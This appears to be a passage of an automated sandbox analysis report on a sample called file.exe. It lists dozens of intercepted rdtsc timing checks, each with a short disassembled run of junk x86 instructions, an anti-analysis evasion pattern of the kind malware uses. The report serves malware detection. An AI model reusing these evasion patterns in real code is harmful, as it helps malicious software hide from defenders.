Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FC03 second address: 110FC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF1610D0706h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FC17 second address: 110FC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FC21 second address: 110FC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FC25 second address: 110FC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF1610B867Dh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FC41 second address: 110FC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D070Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FE03 second address: 110FE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FE07 second address: 110FE3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF1610D0706h 0x00000008 jmp 00007FF1610D0715h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FF1610D0711h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11163DE second address: 11163E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116515 second address: 111654A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0711h 0x00000009 jmp 00007FF1610D0711h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF1610D070Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111654A second address: 1116550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11166C5 second address: 11166D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1610D070Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116837 second address: 111683D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111683D second address: 1116847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF1610D0706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B1FE second address: 111B20C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B20C second address: 111B210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B210 second address: 111B214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B214 second address: 111B21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6237 second address: 10C623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C623B second address: 10C6254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0715h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B91E second address: 111B931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B931 second address: 111B947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0710h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107AB2B second address: 107AB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F01A second address: 111F021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F2E7 second address: 111F301 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF1610B8676h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FF1610B867Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F301 second address: 111F321 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF1610D0708h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF1610D0714h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1127551 second address: 112756E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF1610B8682h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11258E8 second address: 11258EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11258EC second address: 11258F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125B83 second address: 1125B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125B89 second address: 1125BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FF1610B8687h 0x0000000b jne 00007FF1610B8676h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125BAD second address: 1125BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125BB5 second address: 1125BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FF1610B867Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF1610B867Ch 0x00000018 jmp 00007FF1610B8682h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125BF3 second address: 1125BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125BF9 second address: 1125BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11269C9 second address: 11269D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF1610D0712h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11269D3 second address: 11269D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11269D9 second address: 11269E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11269E0 second address: 11269E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11272B4 second address: 11272BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112CA85 second address: 112CA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF1610B8678h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F9B0 second address: 112F9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF1610D0706h 0x0000000a popad 0x0000000b jmp 00007FF1610D070Ch 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FB92 second address: 112FB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FE9A second address: 112FEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 jmp 00007FF1610D0711h 0x0000000d jne 00007FF1610D0706h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FEBA second address: 112FEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FEC2 second address: 112FEEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FF1610D070Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FEEF second address: 112FF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF1610B8678h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FF1610B8676h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FF04 second address: 112FF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130063 second address: 1130067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11301FD second address: 1130203 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130626 second address: 113062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137D9E second address: 1137DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113817B second address: 1138181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138181 second address: 11381A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF1610D0706h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF1610D0713h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11381A7 second address: 11381AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11381AC second address: 11381B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138760 second address: 113879C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF1610B8676h 0x00000008 jmp 00007FF1610B867Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF1610B8683h 0x00000014 jng 00007FF1610B868Bh 0x0000001a pushad 0x0000001b jmp 00007FF1610B867Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138A18 second address: 1138A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113988B second address: 11398C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B8685h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF1610B8684h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11398C0 second address: 11398C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F576 second address: 113F57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F57B second address: 113F587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F587 second address: 113F58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F0BB second address: 113F0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F0C1 second address: 113F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F0C7 second address: 113F0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F0CB second address: 113F0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F0CF second address: 113F0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113F293 second address: 113F29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114C1CD second address: 114C1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114C1D3 second address: 114C1E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF1610B8676h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11524C4 second address: 11524E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF1610D0706h 0x00000008 jmp 00007FF1610D0715h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11524E3 second address: 11524F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FC68 second address: 115FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FC6F second address: 115FC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FC79 second address: 115FC8C instructions: 0x00000000 rdtsc 0x00000002 je 00007FF1610D0706h 0x00000008 js 00007FF1610D0706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FC8C second address: 115FCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF1610B8676h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FF1610B8681h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FCAF second address: 115FCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FCB5 second address: 115FCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115FB26 second address: 115FB31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF1610D0706h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11679EF second address: 11679FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF1610B8676h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11679FD second address: 1167A0C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1167A0C second address: 1167A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116672D second address: 1166733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11669FC second address: 1166A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A02 second address: 1166A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jo 00007FF1610D0706h 0x0000000e pop esi 0x0000000f push ebx 0x00000010 jo 00007FF1610D0706h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A1A second address: 1166A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166B6E second address: 1166B83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF1610D070Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B77F second address: 116B787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B787 second address: 116B790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B340 second address: 116B372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF1610B8686h 0x0000000b jmp 00007FF1610B867Ch 0x00000010 popad 0x00000011 pushad 0x00000012 jnl 00007FF1610B8676h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C23C second address: 117C244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C244 second address: 117C24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188D12 second address: 1188D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188D16 second address: 1188D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FF1610B8678h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188BC7 second address: 1188BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FF1610D0706h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D11C second address: 118D145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Ch 0x00000007 jmp 00007FF1610B867Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FF1610B867Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D145 second address: 118D15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0716h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118CC90 second address: 118CCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B867Ch 0x00000009 jmp 00007FF1610B8681h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118CCB2 second address: 118CCBE instructions: 0x00000000 rdtsc 0x00000002 je 00007FF1610D070Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A2441 second address: 11A2445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A16E4 second address: 11A16EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
